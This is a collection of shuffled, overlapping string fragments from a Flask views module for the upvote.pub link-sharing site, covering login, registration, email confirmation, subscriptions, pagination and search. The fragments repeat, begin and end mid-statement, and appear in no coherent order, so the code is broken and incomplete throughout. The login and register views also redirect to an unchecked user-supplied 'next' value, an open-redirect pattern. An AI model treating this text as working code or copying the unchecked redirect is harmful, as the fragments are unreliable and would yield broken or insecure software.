Please", "visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email)", "\"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs =", "if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit()", "== 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True)", "confirm_email(token): \"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if", "user.email_verified = True db.session.commit() flash(\"Thank you for confirming your email!", "\"\"\" Fetch user subreddits otherwise fetch a list of defaults", "= base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/')", "else: form = subreddit_subs() for subreddit in subreddit_list: sform =", "to validate user's password if user and check_password_hash(user.password, form.password.data): #", "base import search as search_module # don't override function name", "abort, Markup) from werkzeug import check_password_hash, generate_password_hash from logzero import", "sform = sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if", "get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a list of", "return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def", "source (subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page", "thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we order", "email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified", "'' if request.method == 'GET': if 'next' in request.args: next", "email.', 'success') if 'next' in request.form and request.form['next']: return redirect(request.form['next'])", "= Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\"", "if g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs", "form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None)", "user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank you for", "signing up! 
Please confirm your email by following the link", "return redirect(url_for('frontends.home')) next = '' if request.method == 'GET': if", "now has an id db.session.commit() session['user_id'] = user.id flash('Thanks for", "= url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\",", "threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search results for", "render_template, flash, g, session, redirect, url_for, abort, Markup) from werkzeug", "'next' in request.args: next = request.args['next'] form = RegisterForm(request.form) if", "-*- coding: utf-8 -*- \"\"\" \"\"\" import os import markdown2", "in our database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email',", "user in, as he now has an id db.session.commit() session['user_id']", "form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success')", "commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response", "by user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query", "home return redirect(url_for('frontends.home')) next = '' if request.method == 'GET':", "= 15 cur_page = request.args.get('page') or 1 cur_page = int(cur_page)", "and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password',", "None # if we are passing in a resultset, that", "is right if form.validate_on_submit(): # continue where we left off", "next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return", "password is right if form.validate_on_submit(): # continue where we left", "'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search():", "return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form,", "\"\"\"Please visit the link below to confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link),", "<reponame>danielecook/upvote.pub # -*- coding: utf-8 -*- \"\"\" \"\"\" import os", "fetch a list of defaults \"\"\" if g.get('user'): subreddit_subs =", "subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many", "return thread_paginator # sexy line of code :) base_query =", "url_prefix='') @mod.before_request def before_request(): g.user = None if session.get('user_id'): g.user", "to # quickly paginate some arbitrary data, no sorting if", "thread_paginator = None # if we are passing in a", "@mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had to do", "in \"\"\" if g.user: return redirect(url_for('frontends.home')) next = '' if", "elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page,", "'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def", "send them home return redirect(url_for('frontends.home')) next = '' if request.method", "are passing in a resultset, that means we are just", "['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 
'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html',", "= rs.all() num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html',", "request.args: next = request.args['next'] form = LoginForm(request.form) # make sure", "request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form,", "form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs() for", "return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def", "utf-8 -*- \"\"\" \"\"\" import os import markdown2 from flask", "database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) #", "g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot':", "process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count() subreddits = get_subreddits()", "mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user =", "db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user subreddits otherwise", "subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md):", "rs.all() num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title,", "from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='')", "logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next = ''", "id session['user_id'] = user.id if 'next' in request.form and request.form['next']:", "= Subreddit.query.all() form = None if g.user: if request.form: form", "else Thread.query # Filter by user subs logger.info(g.user) if g.user:", "next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create", "thread listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page =", "'next' in request.args: next = request.args['next'] form = LoginForm(request.form) #", "= user.id if 'next' in request.form and request.form['next']: return redirect(request.form['next'])", "subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None,", "int(cur_page) thread_paginator = None # if we are passing in", "content = f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow',", "If not trending we order by creation date \"\"\" atom_url", "@mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md", "= User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the", "None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): 
\"\"\" Confirm user email", "# continue where we left off if so user =", "We had to do some extra work to route the", "form.password.data): # the session can't be modified as it's signed,", "cur_page = int(cur_page) thread_paginator = None # if we are", "rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy", "our database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token", "a thread listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page", "email by following the link sent in the confirmation email.',", "in request.args: next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit():", "if 'next' in request.args: next = request.args['next'] form = RegisterForm(request.form)", "= request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator = None", "import logger from base import db, app from base import", "defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs))", "Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type", "sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top':", "if 'next' in request.args: next = request.args['next'] form = LoginForm(request.form)", "\"\"\" if g.user: # If the user is logged in", "extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html'])", "(Blueprint, request, render_template, flash, g, session, redirect, url_for, abort, Markup)", "'GET': if 'next' in request.args: next = request.args['next'] form =", "'POST']) def register(): \"\"\" Registration page \"\"\" if g.user: #", "form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list", "home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness),", "form.validate_on_submit(): # continue where we left off if so user", "base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes))", "database and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token =", "db, app from base import search as search_module # don't", "def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\"", "= request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create an", "place to store the user id session['user_id'] = user.id if", "= base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif", "redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST'])", "page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True)", "query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query,", "requires_login from base.utils.user_utils import get_school from base.subreddits.forms import 
subreddit_subs, sub_form", "base import db, app from base import search as search_module", "Markup) from werkzeug import check_password_hash, generate_password_hash from logzero import logger", "subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull from a", "so user = User.query.filter_by(email=form.email.data).first() # we use werzeug to validate", "in a resultset, that means we are just looking to", "user.id flash('Thanks for signing up! Please confirm your email by", "sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs', form=form, subreddit_list=subreddit_list)", "sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date':", "subreddit.threads if subreddit else Thread.query # Filter by user subs", "from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import send_email from", "now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST'])", "next = '' if request.method == 'GET': if 'next' in", "@mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def", "\"\"\" import os import markdown2 from flask import (Blueprint, request,", "logger from base import db, app from base import search", "import User from base.threads.models import Thread, Publication from base.subreddits.models import", "sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name", "from a thread listing source (subreddit permalink, homepage, etc) \"\"\"", "from base.users.forms import RegisterForm, LoginForm from base.users.models import User from", "form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs", "subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type", "request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): # create an user", "flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/',", "from base.users.decorators import requires_login from base.utils.user_utils import get_school from base.subreddits.forms", "where we left off if so user = User.query.filter_by(email=form.email.data).first() #", "subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'):", "data, no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True)", "'POST']) def login(): \"\"\" We had to do some extra", "(subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page =", "can't be modified as it's signed, # it's a safe", "results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator", "sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator", "User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record", "else 
\"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(),", "= markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes',", "in the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data),", "check_password_hash, generate_password_hash from logzero import logger from base import db,", "\"\"\" subreddit_list = Subreddit.query.all() form = None if g.user: if", "return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we", "valid, but doesn't validate password is right if form.validate_on_submit(): #", "if user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank you", "can now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET',", "process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull", "\"\"\" if g.user: return redirect(url_for('frontends.home')) next = '' if request.method", "the user id session['user_id'] = user.id if 'next' in request.form", "do some extra work to route the user back to", "Insert the record in our database and commit it db.session.add(user)", "\"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if", "= rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of", "g.user: # If the user is logged in send them", "\"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator)", "render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users", "search as search_module # don't override function name from base.users.forms", "subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs))", "import requires_login from base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs,", "'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/',", "request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger')", "thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>')", "use werzeug to validate user's password if user and check_password_hash(user.password,", "if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting", "@mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\" user =", "True db.session.commit() flash(\"Thank you for confirming your email! 
You can", "subreddit_subs() for subreddit in subreddit_list: sform = sub_form() sform.sub_name =", "in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\",", "is logged in send them home return redirect(url_for('frontends.home')) next =", "x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else:", "a list of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs')", "doesn't validate password is right if form.validate_on_submit(): # continue where", "it's a safe place to store the user id session['user_id']", "logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm", "list of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits", "Log the user in, as he now has an id", "g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs', form=form,", "subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/',", "base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator", "are just looking to # quickly paginate some arbitrary data,", "subreddit_subs, sub_form from base.utils.email import send_email from base.utils.misc import random_string,", "from flask import (Blueprint, request, render_template, flash, g, session, redirect,", "@mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404)", "Please confirm your email by following the link sent in", "the session can't be modified as it's signed, # it's", "return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\"", "Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user = None if", "record in our database and commit it db.session.add(user) email_confirm_link =", "import get_school from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import", "we order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage',", "cur_page = request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator =", "form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs =", "request.path.endswith('trending') else False page_title = \"Trending\" if trending else \"Frontpage\"", "base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type", "etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page') or 1", "# it's a safe place to store the user id", "user.email) # Log the user in, as he now has", "coding: utf-8 -*- \"\"\" \"\"\" import os import markdown2 from", "base.subreddits.models import Subreddit from base.users.decorators import requires_login from base.utils.user_utils import", "override function name from base.users.forms import RegisterForm, LoginForm from 
base.users.models", "be modified as it's signed, # it's a safe place", "\\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in our", "an id db.session.commit() session['user_id'] = user.id flash('Thanks for signing up!", "return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows", "subreddits otherwise fetch a list of defaults \"\"\" if g.get('user'):", "no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return", "if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\", "RegisterForm(request.form) if form.validate_on_submit(): # create an user instance not yet", "from base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs, sub_form from", "# don't override function name from base.users.forms import RegisterForm, LoginForm", "of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits =", "Thread.query # Filter by user subs logger.info(g.user) if g.user: subreddit_subs", "g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs =", "subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else:", "next = request.args['next'] form = LoginForm(request.form) # make sure data", "data is valid, but doesn't validate password is right if", "= User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True db.session.commit()", "user and check_password_hash(user.password, form.password.data): # the session can't be modified", "methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>')", "sort_type='hot'): \"\"\" abstracted because many sources pull from a thread", "= '' if request.method == 'GET': if 'next' in request.args:", "'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query =", "url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash from logzero", "work to route the user back to his or her", "university=get_school(form.email.data), email_token=random_string()) # Insert the record in our database and", "before logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next =", "def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources", "def register(): \"\"\" Registration page \"\"\" if g.user: # If", "if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs')", "search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches =", "email! 
You can now submit and comment.\", 'success') return redirect(url_for('frontends.home'))", "sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new':", "= {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form =", "if form.validate_on_submit(): # create an user instance not yet stored", "def before_request(): g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id'])", "it's signed, # it's a safe place to store the", "subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group", "flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs() for subreddit", "= True db.session.commit() flash(\"Thank you for confirming your email! You", "{'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs()", "url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please", "'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form =", "= send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below to", "\"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token", "if user and check_password_hash(user.password, form.password.data): # the session can't be", "in send them home return redirect(url_for('frontends.home')) next = '' if", "subreddit in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group", "form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs if x['value']]))", "'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return", "we left off if so user = User.query.filter_by(email=form.email.data).first() # we", "user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True", "base.users.forms import RegisterForm, LoginForm from base.users.models import User from base.threads.models", "elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type ==", "def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with", "in the confirmation email.', 'success') if 'next' in request.form and", "_external=True) trending = True if request.path.endswith('trending') else False page_title =", "RegisterForm, LoginForm from base.users.models import User from base.threads.models import Thread,", "had to do some extra work to route the user", "base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on))", "email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below", "your email! 
You can now submit and comment.\", 'success') return", "def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a list", "thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had", "You can now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/',", "passing in a resultset, that means we are just looking", "them home return redirect(url_for('frontends.home')) next = '' if request.method ==", "return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page", "base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type", "form = RegisterForm(request.form) if form.validate_on_submit(): # create an user instance", "of code :) base_query = subreddit.threads if subreddit else Thread.query", "flask import (Blueprint, request, render_template, flash, g, session, redirect, url_for,", "= Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user", "# make sure data is valid, but doesn't validate password", "= f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as", "md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables',", "user id session['user_id'] = user.id if 'next' in request.form and", "validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user", "base.users.decorators import requires_login from base.utils.user_utils import get_school from base.subreddits.forms import", "render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login():", "many sources pull from a thread listing source (subreddit permalink,", "Default set of subreddits subreddits = Subreddit.query.all() return subreddits def", "request.args['next'] form = LoginForm(request.form) # make sure data is valid,", ".filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits():", "\"\"\" Registration page \"\"\" if g.user: # If the user", "we use werzeug to validate user's password if user and", "the record in our database and commit it db.session.add(user) email_confirm_link", "random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request():", "email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in", "# Insert the record in our database and commit it", "def confirm_email(token): \"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first()", "rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of code", "Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators import requires_login", "not yet stored in the database user = User(username=form.username.data, email=form.email.data,", "= Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ 
.filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))", "arbitrary data, no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page,", "f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f:", "markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata',", "from logzero import logger from base import db, app from", "subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for", "None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if", "base_query = subreddit.threads if subreddit else Thread.query # Filter by", "= subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs']", "= request.args['next'] form = LoginForm(request.form) # make sure data is", "= Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user = None", "thread_paginator # sexy line of code :) base_query = subreddit.threads", "form_subs = list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs", "Fetch user subreddits otherwise fetch a list of defaults \"\"\"", "redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form, next=next)", "return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def", "to search threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search", "def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs =", "your email by following the link sent in the confirmation", "sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in", "following the link sent in the confirmation email.', 'success') if", "right if form.validate_on_submit(): # continue where we left off if", "= get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET',", "= g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type ==", "render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md,", "the user back to his or her original place before", "sources pull from a thread listing source (subreddit permalink, homepage,", "email_token=random_string()) # Insert the record in our database and commit", "create an user instance not yet stored in the database", "if g.user: # If the user is logged in send", "rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs", "logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) #", "trending we order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed',", "Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ 
